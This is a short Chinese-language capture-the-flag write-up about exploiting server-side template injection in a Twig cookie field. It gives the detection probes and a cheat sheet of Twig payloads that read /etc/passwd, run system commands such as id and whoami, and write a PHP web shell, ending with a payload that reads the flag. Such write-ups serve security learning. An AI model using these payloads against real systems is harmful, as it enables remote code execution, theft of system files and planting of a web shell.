点开flag，输入一个123发现有hello 123，这种输入什么就输出什么的地方往往是ssti注入的点

根据这道题的名字，我们重点关注一下Cookie

打开hackbar，发现Cookie里面有一个user=123，我们测试一手{{7*7}}

算出来了49，推断是php的Twig模板或者python的jinjia2模板，接着用{{7*’7′}}来测试

还是49，锁定Twig，因为如果是jinjia2会输出7777777，我们直接学一手Twig模板注入（没想到是以这道题为例子的），这里贴一些常用的Twig注入语句

{{'/etc/passwd'|file_excerpt(1,30)}}
{{app.request.files.get(1).__construct('/etc/passwd','')}}{{app.request.files.get(1).openFile.fread(99)}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}
{{_self.env.enableDebug()}}{{_self.env.isDebug()}}
{{["id"]|map("system")|join(",")}}
{{{"<?php phpinfo();":"/var/www/html/shell.php"}|map("file_put_contents")}}
{{["id",0]|sort("system")|join(",")}}
{{["id"]|filter("system")|join(",")}}
{{[0,0]|reduce("system","id")|join(",")}}
{{['cat /etc/passwd']|filter('system')}}
{{["whoami"]|map("system")}}
{{["whoami"]|map("passthru")}}

构造payload：{{_self.env.registerUndefinedFilterCallback("exec")}} {{_self.env.getFilter("cat /flag")}}